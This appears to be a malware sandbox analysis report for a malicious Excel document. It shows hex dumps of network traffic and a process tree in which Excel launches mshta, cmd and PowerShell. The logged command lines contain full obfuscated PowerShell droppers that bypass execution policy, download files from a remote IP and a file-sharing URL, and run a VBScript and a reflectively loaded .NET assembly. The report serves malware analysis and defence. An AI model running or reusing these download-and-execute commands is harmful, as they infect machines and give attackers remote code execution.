                                                  2024-12-02 06:25:17 UTC8192INData Raw: 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c 6b 1e d3 78 44 b3 e9 3c ed e8 97 f8 43 74 3f 1b c6 f4 cf 3f 85 ce ba 77 da d1 48 c4 86 f7 3f 03 81 84 fa 49 e0 da e5 1a 3f 55 2f 3b 49 3e f9 b5 a5 d6 c3 06 88 41 24 c2 47 73 6c 0f aa 99 b2 de 37 36 f8 da 3f 21 88 46 07 7b 70 07 1d
                                                  Data Ascii: %y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v|kxD<Ct??wH?I?U/;I>A$Gsl76?!F{p
                                                  2024-12-02 06:25:17 UTC8192INData Raw: 24 84 8e e4 11 ce 06 64 fe 16 cf 20 71 23 2b f5 e4 70 72 d0 23 6e 0b 29 da c9 d8 f7 e7 36 35 05 06 96 30 2d 9f 6f 7c f3 b3 49 ac 69 e8 46 6d 4f 5a e3 03 5c de c0 28 55 d8 c2 c0 ea 14 b1 03 8e f9 95 e7 eb 28 12 80 83 c1 ae d8 70 a5 9c 12 e7 cb ff 00 08 c0 76 69 94 b2 81 1d 8e a5 b1 76 94 3d d2 01 d8 0c 93 22 35 20 24 57 63 8b a8 74 9a 47 93 98 c7 e1 38 0d 25 b1 16 28 f7 c7 02 a1 1e ae 49 e0 2e 79 dd 68 9d 26 67 8e 52 a9 b4 1c 3c de 2d 24 11 42 9b 55 d8 ad 93 7d fb 60 68 6a 35 09 a2 8c bc b4 49 e1 57 b9 39 95 1e 9f 53 e3 52 36 a6 56 d9 12 fb 0e 00 1e d8 dc 05 fc d8 35 da a7 a6 b0 54 15 04 06 06 ef 3d 2e 97 ed 2f 88 88 f6 45 ab 52 07 3b 55 10 1f 95 01 81 8f 16 87 4d 0e 94 ba a1 27 f8 49 6c 1c ba 57 8f 4c b2 06 50 4f 6a e7 3d 07 88 ec f1 7d 17 df e2 4f 2a 64
                                                  Data Ascii: $d q#+pr#n)650-o|IiFmOZ\(U(pviv="5 $WctG8%(I.yh&gR<-$BU}`hj5IW9SR6V5T=./ER;UM'IlWLPOj=}O*d
                                                  2024-12-02 06:25:17 UTC8192INData Raw: 46 fb 54 0a ef ce 07 22 c2 ec 8f 1e a6 66 49 4b 6d da d2 1b 03 bd ee 3d f2 ba dd 46 9f 45 2a 24 8d 3b 16 6d a4 2c ec 08 e9 47 96 c6 f4 1a 35 8f c3 74 a9 23 15 92 15 20 8b ee 6f ae 2b e2 b0 3b 6b 21 64 d3 b3 45 b4 6e 74 bb dd f1 a6 18 16 9f 4b 33 b4 52 69 27 7f 22 a9 95 a5 7f 51 bf 7b c5 3c 4f ca 4d 14 e8 7c e4 95 82 b0 0f 33 10 cd ba 8f 04 d7 f0 f5 cd 5f 0f 69 61 f0 ff 00 2b 50 18 36 e6 da 5b 92 07 6e b9 9d f6 8d 75 0b e1 f1 ca a4 b4 4a 69 c0 21 54 73 c1 fc e8 60 64 c5 e1 32 be 82 1d 5c 6b b8 04 6d e1 9f f0 80 cd ce 2d f7 57 d4 48 91 88 c9 91 c6 e5 e8 01 1e f6 73 6f c1 e4 96 7f 02 68 c3 ed 72 8d b0 70 45 96 61 55 f1 aa fa e7 2f 87 b4 70 69 75 b3 34 91 c8 8b 18 64 07 f0 f6 3f 21 57 66 f8 17 81 82 fa 79 74 f2 98 a5 55 dc bd 76 90 6b f2 ca 58 36 05 9f 7a c6
                                                  Data Ascii: FT"fIKm=FE*$;m,G5t# o+;k!dEntK3Ri'"Q{<OM|3_ia+P6[nuJi!Ts`d2\km-WHsohrpEaU/piu4d?!WfytUvkX6z
                                                  2024-12-02 06:25:17 UTC8192INData Raw: 6d 3e a3 df 2a 92 b3 3e d0 14 06 e2 c0 c0 b6 a7 60 da 00 ac aa 4c 04 1e 53 ee db 76 2b a5 e3 9f 77 8c a9 49 19 8b 01 43 db 0d a7 f0 c8 25 4f 59 90 1e e4 1e 30 11 3a ba 40 84 31 03 9e b9 ab a6 d5 2c fa 5d be a6 2a 28 ae ee 46 64 6a 21 8f 4f a8 29 cb 01 84 d1 cc 90 ce a4 06 25 b8 23 00 72 b2 ac f3 06 52 7d 6d 5c d5 73 97 f0 f3 ff 00 6d 53 40 70 7b 5f 6c 0c a5 7c e9 2c 30 25 8d 0f ae 31 a4 45 8a 6f 32 46 20 2a 96 55 1f 88 f1 fa 60 6d 3a 17 00 2f 41 ea 38 16 d4 47 0a 80 5c 71 d4 f6 18 b9 d4 cd 14 9e a6 0a 82 c8 41 c9 db c7 7f ae 67 6a 48 9b 53 23 05 2a 59 81 00 fb 56 03 f3 78 9c 61 a9 2d 87 73 db 19 1a b4 68 43 0b 61 59 98 da 15 15 fb c0 38 e6 f1 8d 26 91 11 8b b3 9a fe 1f 63 80 74 64 91 37 2a 31 53 d8 e2 ba c6 52 9b 08 b6 3d 3d 58 cc 69 be 06 f2 de 81 04 0f
                                                  Data Ascii: m>*>`LSv+wIC%OY0:@1,]*(Fdj!O)%#rR}m\smS@p{_l|,0%1Eo2F *U`m:/A8G\qAgjHS#*YVxa-shCaY8&ctd7*1SR==Xi
                                                  2024-12-02 06:25:17 UTC8192INData Raw: de 44 4c 11 9d 14 9a ed 80 d6 68 02 c6 65 89 48 5e b5 ef 96 8c bb c6 0a 4a b2 39 1c 96 7e 17 e8 31 e0 cf a7 d3 a2 34 b1 01 d5 9a 41 66 ba fa 6f f2 c0 c0 85 03 4a a1 81 db 74 4e 6f 2e 8d 8e 99 a3 d3 c6 ad c5 ae f1 75 99 32 47 18 32 08 9d 36 a9 ea cd ea 3f 2a 19 6d 18 9e 52 51 35 2b 15 ff 00 89 c8 fe 58 16 94 43 01 11 ea 21 61 20 ea c3 8f cb 34 3c 3f 53 08 57 65 0a 84 8d a0 9a b0 3d f1 29 74 fa a6 91 d2 49 14 b7 53 64 92 05 8e 86 be 18 3f 28 a9 a3 a8 42 58 74 0d 55 7e fc 60 7a 58 0e 9a 58 1b cb 95 8c 7b 68 f1 61 b1 8d 24 10 e9 dc c7 09 6a 72 28 d7 04 f7 cc 9d 0f 86 78 8c 24 34 1a 98 51 59 2b 6e e6 20 f3 f1 19 af a4 d1 ea 16 49 b5 12 6a 44 ac c4 b8 8c 9b 51 c9 ae 48 be d8 07 99 03 c5 2c 2c 68 32 b2 80 bd 79 07 90 6b ae 79 33 1c 53 b2 c8 4c 8a 1b cc de 18 ee
                                                  Data Ascii: DLheH^J9~14AfoJtNo.u2G26?*mRQ5+XC!a 4<?SWe=)tISd?(BXtU~`zXX{ha$jr(x$4QY+n IjDQH,,h2yky3SL
                                                  2024-12-02 06:25:17 UTC8192INData Raw: a6 f0 77 9b 44 26 f2 95 24 1b 59 57 b3 a8 1e cd 75 fe b8 1d 70 ba 8f 0b 92 58 b6 47 01 8d 59 c0 25 d2 2d c1 7b 90 55 40 e0 ff 00 9b 1f d0 78 80 93 4a 9a 89 09 58 94 31 24 29 f4 81 7e d5 dc 37 6c 14 1e 22 66 98 20 89 96 49 90 34 42 47 60 18 0b ed fc 3c 73 80 83 f8 03 fa d1 93 78 12 29 f3 ac 2d a9 07 77 a6 fb 1a ce 6f 0c 78 f4 27 4b 1e 95 65 95 9b d1 3d a9 dc 2e c1 bb e3 81 54 71 f8 b5 93 6a bc ca 48 c6 c7 64 a6 73 4c 41 16 2f 6f b5 e0 4f 89 3b e9 b4 ba d3 14 6a ad 2e d5 56 93 dc 30 36 6b 8c 00 6a bc 3a 0d 66 bf 54 b1 c3 1a 88 e0 64 50 b4 b5 2f 6b fc f2 d1 78 73 c7 aa d1 15 8d 96 32 14 4e aa e1 41 65 5b 52 54 55 fa 81 37 96 d4 eb 24 fb c1 78 55 49 3a 76 91 9a 39 03 2e d1 63 93 b6 cf 4f 7c 1a 78 8c 8e 93 07 11 b4 b6 82 30 a4 21 90 30 a0 28 f7 e9 80 6f 1b d4
                                                  Data Ascii: wD&$YWupXGY%-{U@xJX1$)~7l"f I4BG`<sx)-wox'Ke=.TqjHdsLA/oO;j.V06kj:fTdP/kxs2NAe[RTU7$xUI:v9.cO|x0!0(o
                                                  2024-12-02 06:25:17 UTC8192INData Raw: 5c ba 94 3e 95 1c 28 f6 ff 00 ae 04 14 f3 4f 12 fc 48 e9 83 31 05 07 d5 f4 f7 c2 44 94 4f b5 64 84 2c 39 c0 e4 86 e1 24 b5 6e ec 73 43 45 e1 ea c8 1c cc 14 8e 45 62 6a a4 2e de c7 34 b4 b0 b3 c2 ac 87 a0 aa fa e0 0e 6f 0f 77 98 16 99 99 4f 00 fb 65 8f 86 24 6a 5c cc 7d 23 1c 86 27 79 57 73 7a 42 f2 3e 37 83 d4 c2 ff 00 76 52 5a 94 df 3e fc e0 66 69 b4 fe 7c a5 37 91 de fd f1 d1 a0 2b 4b e7 b0 c1 c4 be 59 2c 3f 16 34 65 f5 07 07 8d be af 9e 02 33 c0 52 b7 cd bf b0 c2 ae 8c 90 b5 3d 12 3a 65 5d 37 31 62 3a e7 22 15 60 c3 a8 c0 24 50 f9 6c 76 ea 39 ef 91 2c 0d b7 d5 31 6f 96 13 ca 42 8c 41 7b be 40 ca a2 7a 8a 28 34 df 1a c0 45 e1 b7 02 c9 07 b9 c3 1f 0f 55 50 c5 e8 9e 98 63 a6 90 96 21 49 0b f8 98 0e 07 d7 2a 60 63 c9 fa 60 5f c3 34 4c 35 8a e4 f0 2f 68 f7
                                                  Data Ascii: \>(OH1DOd,9$nsCEEbj.4owOe$j\}#'yWszB>7vRZ>fi|7+KY,?4e3R=:e]71b:"`$Plv9,1oBA{@z(4EUPc!I*`c`_4L5/h
                                                  2024-12-02 06:25:17 UTC8192INData Raw: 6b f8 78 20 9c 8f 0e f0 6d 27 86 f8 6b 78 87 8c 21 f4 95 31 42 c4 86 e0 92 05 03 c9 3e d5 c7 37 5c d2 da ef b4 3a 8d 7b c6 25 81 c8 64 53 0c 5a 7d 4f a7 76 ed ca 59 57 bd 00 36 92 3a 13 c1 3c 06 b6 a7 c7 34 5a 59 57 56 27 5d 5b 99 df 6c b2 a9 6f 2c 28 50 e9 19 55 e2 d5 80 1c d7 52 5b b1 f3 b2 f8 b4 5a b1 0b 6b b5 4d 34 cc b3 29 7d bb 56 2d f1 aa 82 45 72 a2 8d ed 00 d8 35 bb 82 73 f5 7a 78 a3 2a f0 3c 92 69 a4 b3 1b 3a 32 fc 0a dd 51 2b cf 22 c5 1b e0 9a c4 88 5d b2 31 0c 08 20 02 a2 d4 1f 8d fc 8f e5 81 a1 e2 1a 98 b5 0d a4 84 f9 2b 1a 21 0d 2c 51 95 53 6c 4b 30 b1 b8 f5 3c 50 03 a0 15 58 8c d2 a3 93 22 a8 5d c5 95 94 5f 03 76 e0 4f f2 ff 00 87 3a 10 95 24 93 ac 85 59 58 23 21 00 06 1c 8e 3d ac 8f cf 15 77 2e cc cc 6c 93 66 85 5e 05 c6 dd a4 ee 50 2d 7d
                                                  Data Ascii: kx m'kx!1B>7\:{%dSZ}OvYW6:<4ZYWV'][lo,(PUR[ZkM4)}V-Er5szx*<i:2Q+"]1 +!,QSlK0<PX"]_vO:$YX#!=w.lf^P-}


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:01:24:11
                                                  Start date:02/12/2024
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                  Imagebase:0x13f600000
                                                  File size:28'253'536 bytes
                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:4
                                                  Start time:01:24:36
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\mshta.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                  Imagebase:0x13f740000
                                                  File size:13'824 bytes
                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:01:24:42
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
                                                  Imagebase:0x4abb0000
                                                  File size:345'088 bytes
                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:8
                                                  Start time:01:24:42
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
                                                  Imagebase:0x13f4c0000
                                                  File size:443'392 bytes
                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:01:24:45
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
                                                  Imagebase:0x13f6a0000
                                                  File size:2'758'280 bytes
                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:01:24:46
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"
                                                  Imagebase:0x13fcc0000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:01:24:52
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
                                                  Imagebase:0xffbb0000
                                                  File size:168'960 bytes
                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:13
                                                  Start time:01:24:53
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
                                                  Imagebase:0x13f4c0000
                                                  File size:443'392 bytes
                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:01:24:57
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\mshta.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                  Imagebase:0x13f1a0000
                                                  File size:13'824 bytes
                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:01:25:04
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
                                                  Imagebase:0x4a330000
                                                  File size:345'088 bytes
                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:19
                                                  Start time:01:25:04
                                                  Start date:02/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
